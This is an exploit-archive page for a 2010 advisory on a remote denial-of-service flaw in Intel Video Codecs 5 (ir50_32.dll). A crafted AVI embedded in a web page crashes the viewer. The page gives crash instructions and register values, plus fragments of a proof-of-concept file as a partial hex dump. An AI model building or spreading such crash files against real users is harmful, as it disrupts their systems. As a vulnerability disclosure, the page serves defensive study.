[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Intel Video Codecs v5 Remote Denial Of Service Vulnerability
# Published : 2010-09-03
# Author : Matthew Bergin
# Previous Title : FFDshow SEH Exception leading to NULL pointer on Read
# Next Title : MOAUB #6 - HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution
Intel Video Codecs 5 Remote Denial of Service
Author: Matthew Bergin
Website: http://berginpentesting.com/
Email: matt@berginpentesting.com
Date: August 27, 2010
Filename: ir50_32.dll
Version: 5.2562.15.55
Description:
A remote user can cause denial of service conditions on remote hosts by embedding a specially crafted AVI file into an HTML page. The included PoC will also cause crash conditions locally if viewed by My Computer.
Application Events Notice:
Faulting application explorer.exe, version 6.0.2900.5512, faulting module ir50_32.dll, version 5.2562.15.55, fault address 0x00002897.
Crash Instructions:
MOV EDI, DWORD PTR DS:[EDX+EDI*4-4] <- Crash Here
MOV AH, AL
AND CH, 0C0
CMP CH, 40
JE ir50_32.738727C3
Crash Registers:
eax 00030026
ecx 00000DEA
edx 02b80004
ebx 00000001
esp 0849f420
ebp fb202196
esi 05d5fe4c
edi 7ecc7dc7
eip 73872c52
Reproduction
PoC File:
Addr : 0 1 2 3 4 5 6 7 8 9 A B C D E F
2090h: F3 2C 00 7E 12 C8 71 2D 88 F8 BC CF DD 6F F8 E0 ó,
....
20B0h: B1 97 C5 F3 79 29 F0 41 92 71 0D C0 7E 73 F1 EC ±—Åóy)ðA’q
À~sñì
....
2120h: CE 87 8E C3 10 FA 17 49 86 E7 E1 23 33 AC F1 89 ·Ž?ú�I†??3¬ñ?
....
21E0h: 37 FA 7F 3F 16 F7 D7 CF 39 CF 0F F1 94 C0 C0 34 7ú?�÷×Ï9Ï�ñ”